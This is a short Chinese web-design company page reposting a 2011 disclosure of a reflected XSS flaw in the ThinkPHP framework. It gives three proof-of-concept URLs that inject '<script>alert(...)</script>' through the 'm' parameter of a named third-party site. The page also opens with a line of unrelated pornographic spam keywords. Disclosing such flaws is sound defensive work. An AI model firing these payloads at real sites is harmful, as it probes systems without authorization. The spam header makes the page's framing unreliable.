欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識(shí)學(xué)堂 > 網(wǎng)站建設(shè)知識(shí)
ThinkPHP開發(fā)框架xss
更新時(shí)間:2011-12-26 | 發(fā)布人:本站 | 點(diǎn)擊率:383
簡(jiǎn)要描述:開源php開發(fā)框架默認(rèn)存在xss漏洞,導(dǎo)致所有使用該框架開發(fā)的系統(tǒng)都存在xss漏洞
 
詳細(xì)說明:對(duì)不不存在的模塊處理錯(cuò)誤不當(dāng),導(dǎo)致xss漏洞
 
漏洞證明:
 
以超級(jí)巡警測(cè)試
 
 
 
http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login
 
http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&
 
http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&
 
 
 
去看看
 
修復(fù)方案:設(shè)置好過濾吧~~~
相關(guān)文章